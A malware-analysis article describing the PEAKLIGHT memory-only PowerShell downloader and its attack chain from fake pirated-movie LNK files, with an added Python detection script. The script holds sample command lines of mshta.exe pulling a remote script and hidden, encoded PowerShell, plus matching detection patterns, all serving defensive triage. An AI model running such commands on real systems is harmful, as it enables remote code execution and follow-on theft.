PEAKLIGHT Downloader
Cybersecurity researchers have discovered a novel dropper designed to deploy subsequent malware stages, ultimately targeting Windows systems with information stealers and loaders.
This memory-only dropper decrypts and runs a PowerShell-based downloader, identified as PEAKLIGHT. The malware strains distributed through this method include Lumma Stealer, Hijack Loader (also known as DOILoader, IDAT Loader, or SHADOWLADDER), and CryptBot, all of which are offered as part of a malware-as-a-service (MaaS) model.
Initial Attack Vector and Attack Chain
The attack chain begins with a Windows shortcut (LNK) file that is downloaded through drive-by download methods, such as when users search for movies online. These LNK files are packaged in ZIP archives disguised as pirated films.
Once downloaded, the LNK file connects to a Content Delivery Network (CDN) that hosts an obfuscated, memory-only JavaScript dropper. This dropper then executes the PEAKLIGHT PowerShell downloader script on the victim's machine, which, in turn, contacts a Command-and-Control (C2) server to retrieve further payloads.
Researchers have observed various LNK file variations, with some using asterisks (*) as wildcards to invoke the legitimate mshta.exe binary, allowing the malicious code (i.e., the dropper) to be discreetly executed from a remote server.
PEAKLIGHT Hides Its Threatening Action behind Legitimate Movies
The droppers themselves have been found to carry both hex-encoded and Base64-encoded PowerShell payloads. Decoding these payloads yields PEAKLIGHT, a tool designed to deploy subsequent malware on an infected system while also downloading a legitimate movie trailer, likely as a decoy.
PEAKLIGHT functions as an obfuscated PowerShell-based downloader within a multi-stage execution chain. It searches for ZIP archives in specific hard-coded file paths. If these archives are not found, the downloader contacts a CDN site to download the archive file and save it to the disk.
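The chain described above (an LNK launching mshta.exe through a wildcard path against a remote script, then encoded PowerShell spawned from mshta.exe) leaves a recognisable trail in process-creation telemetry. The following is an added example, not code from the original report: a minimal Python triage over constructed sample events (every path, hostname and command line below is made up) that flags those behaviours while leaving ordinary PowerShell and media-player launches alone.

```python
import re

# Constructed sample process-creation events (not real telemetry), modelled on the
# chain above: LNK -> mshta.exe via wildcard path + remote script -> encoded PowerShell.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\Sys*\msh*.exe" https://cdn.example.invalid/a.js'},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -EncodedCommand <base64-placeholder>"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Program Files\VLC\vlc.exe",
     "cmdline": r'"C:\Program Files\VLC\vlc.exe" D:\Movies\trailer.mp4'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ep bypass -File C:\Tools\backup.ps1"},
]

URL_RE = re.compile(r"\bhttps?://", re.I)
# -e, -enc, -EncodedCommand as whole tokens; "-ep" (ExecutionPolicy) must not match
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:nc(?:odedcommand)?)?(?=\s|$)", re.I)
FIRST_TOKEN_RE = re.compile(r'\s*"?([^"\s]+)')
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> list:
    """Return the names of the behavioural rules this single event matches."""
    image, parent, cmd = basename(event["image"]), basename(event["parent"]), event["cmdline"]
    hits = []
    if image == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_script")    # script pulled straight from a remote host
    first = FIRST_TOKEN_RE.match(cmd)
    if first and "*" in first.group(1):
        hits.append("wildcard_binary_path")   # globbing used to name the binary
    if image in POWERSHELL and parent == "mshta.exe":
        hits.append("powershell_from_mshta")  # stage hand-off described above
    if image in POWERSHELL and ENCODED_RE.search(cmd):
        hits.append("encoded_powershell")     # Base64 payload instead of a script file
    return hits


def triage(events: list) -> dict:
    """Map event index -> matched rules, keeping only events with at least one hit."""
    return {i: h for i, e in enumerate(events) if (h := score_event(e))}
```

Run against SAMPLE_EVENTS, triage() reports only the first two events; the benign VLC launch and the script-file PowerShell invocation produce no hits.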
This is not the first instance of malware targeting users searching for pirated movies. In early June 2024, researchers uncovered a sophisticated infection chain that resulted in the deployment of Hijack Loader following an attempt to download a video file from a movie download site.
Downloaders Open the Door for More Specialized Malware
Downloader malware poses several significant dangers to both individuals and organizations:
- Initial Compromise: Downloader malware is often the first stage of a larger attack. Once installed, it can silently download and install additional malicious payloads, including more advanced malware.
- Data Theft: The additional payloads delivered by downloader malware can include information stealers that capture private data, such as login credentials, financial information, and personal details, leading to identity theft and financial loss.
- System Hijacking: Some downloader malware is designed to deploy remote access tools or backdoors, allowing attackers to gain control over the infected system. This can lead to unauthorized access to corporate networks, data breaches, and further system compromise.
- Ransomware Deployment: Downloader malware may be used to install ransomware, which can encrypt a victim's files and demand a ransom payment for their release. This can result in significant data loss and operational disruption.
- Increased Vulnerability: Once installed, downloader malware can weaken system defenses and create vulnerabilities that other types of malware can exploit. This makes it easier for attackers to deploy more dangerous or persistent threats.
- Network Propagation: Downloader malware can spread across networks, infecting other devices and systems within the same environment. This can cause widespread damage and increase the complexity of remediation efforts.
- Resource Drain: The malware can consume system resources such as CPU and bandwidth, leading to degraded performance and potential service outages. This can affect productivity and increase operational costs.
- Legal and Compliance Risks: Infected organizations may face legal and compliance issues, especially if the data breach involves sensitive or regulated information. This can result in fines, legal actions, and reputational damage.
Overall, downloader malware is a serious threat because of its role in enabling further attacks and undermining the security and integrity of the systems and networks it infects.